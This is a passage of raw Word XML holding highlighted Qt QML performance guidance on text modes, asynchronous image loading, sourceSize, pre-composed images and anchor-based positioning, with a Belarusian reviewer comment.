          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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You should only </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AutoText</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if the text might be (but probably isn't)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>StyledText</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as this mode will incur a parsing cost</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RichText</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mode should not be used,</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as</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StyledText</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provides almost all of its features at a fraction of its cost.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A24CD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="918" w:name="images"/>
      <w:bookmarkStart w:id="919" w:name="_Toc483000724"/>
      <w:bookmarkStart w:id="920" w:name="_Toc483003741"/>
      <w:bookmarkStart w:id="921" w:name="_Toc483604076"/>
      <w:bookmarkStart w:id="922" w:name="_Toc483605296"/>
      <w:bookmarkEnd w:id="918"/>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Images</w:t>
      </w:r>
      <w:bookmarkEnd w:id="919"/>
      <w:bookmarkEnd w:id="920"/>
      <w:bookmarkEnd w:id="921"/>
      <w:bookmarkEnd w:id="922"/>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B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Images are a vital part of any user interface</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Unfortunately, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>they are also a big source of problems due to the time it takes to load them, the amount of memory they consume, and the way in which they are used</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A24CD">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="923" w:name="asynchronous-loading"/>
      <w:bookmarkStart w:id="924" w:name="_Toc483000725"/>
      <w:bookmarkStart w:id="925" w:name="_Toc483604077"/>
      <w:bookmarkStart w:id="926" w:name="_Toc483605297"/>
      <w:bookmarkEnd w:id="923"/>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Asynchronous Loading</w:t>
      </w:r>
      <w:bookmarkEnd w:id="924"/>
      <w:bookmarkEnd w:id="925"/>
      <w:bookmarkEnd w:id="926"/>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Images </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are often quite large</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and so it is wise to ensure that </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loading an image doesn't block the UI thread</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set the "asynchronous" property of the QML Image element to</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to enable asynchronous loading of images from the local file system</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">remote </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>images are always loaded asynchronously</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where this would not result in a negative impact upon the aesthetics of the user interface</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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Image elements with the "asynchronous" property set to</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true</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">will load images in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B26784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>low-priority worker thread</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A24CD">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="927" w:name="explicit-source-size"/>
      <w:bookmarkStart w:id="928" w:name="_Toc483000726"/>
      <w:bookmarkStart w:id="929" w:name="_Toc483604078"/>
      <w:bookmarkStart w:id="930" w:name="_Toc483605298"/>
      <w:bookmarkEnd w:id="927"/>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Explicit Source Size</w:t>
      </w:r>
      <w:bookmarkEnd w:id="928"/>
      <w:bookmarkEnd w:id="929"/>
      <w:bookmarkEnd w:id="930"/>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If your application </w:t>
      </w:r>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loads a large image but displays it in a small-sized element</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, set the "</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0CB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sourceSize</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" property to the size of the element being rendered to ensure that the smaller-scaled version of the image is kept in memory, rather than the large one.</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Beware that </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0CB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>changing the sourceSize will cause the image to be reloaded</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A24CD">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="931" w:name="avoid-run-time-composition"/>
      <w:bookmarkStart w:id="932" w:name="_Toc483000727"/>
      <w:bookmarkStart w:id="933" w:name="_Toc483604079"/>
      <w:bookmarkStart w:id="934" w:name="_Toc483605299"/>
      <w:bookmarkEnd w:id="931"/>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Avoid Run-time Composition</w:t>
      </w:r>
      <w:bookmarkEnd w:id="932"/>
      <w:bookmarkEnd w:id="933"/>
      <w:bookmarkEnd w:id="934"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="007A24CD" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Also remember that you </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0CB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can avoid doing composition work at run-time by providing the pre-composed image resource with your application</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0CB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, providing elements with shadow effects).</w:t>
      </w:r>
      <w:r w:rsidR="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="007A24CD" w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>лепей гэта зразумець</w:t>
      </w:r>
      <w:r w:rsidR="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="007A24CD">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="935" w:name="position-elements-with-anchors"/>
      <w:bookmarkStart w:id="936" w:name="_Toc483000728"/>
      <w:bookmarkStart w:id="937" w:name="_Toc483003742"/>
      <w:bookmarkStart w:id="938" w:name="_Toc483604080"/>
      <w:bookmarkStart w:id="939" w:name="_Toc483605300"/>
      <w:bookmarkEnd w:id="935"/>
      <w:r w:rsidRPr="007A24CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Position Elements With Anchors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="936"/>
      <w:bookmarkEnd w:id="937"/>
      <w:bookmarkEnd w:id="938"/>
      <w:bookmarkEnd w:id="939"/>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It is </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0CB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>more efficient to use anchors rather than bindings to position items relative to each other</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Consider this </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0CB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of bindings to position rect2 relative to rect1:</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rect1</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x</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rect2</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x</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x</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y</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y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height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width </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This </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0CB2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is achieved more efficiently using anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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rect1</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x</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rect2</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anchors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left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left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anchors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top</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bottom</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anchors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right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rect1</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right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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    anchors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rightMargin</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3656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Positioning with bindings</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (by assigning binding expressions to the x, y, width and height properties of visual objects, rather than using anchors) </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is relatively slow</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>although it allows maximum flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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3656A0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the layout is not dynamic, the most performant way to specify the layout is via static initialization of the x, y, width and height properties</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
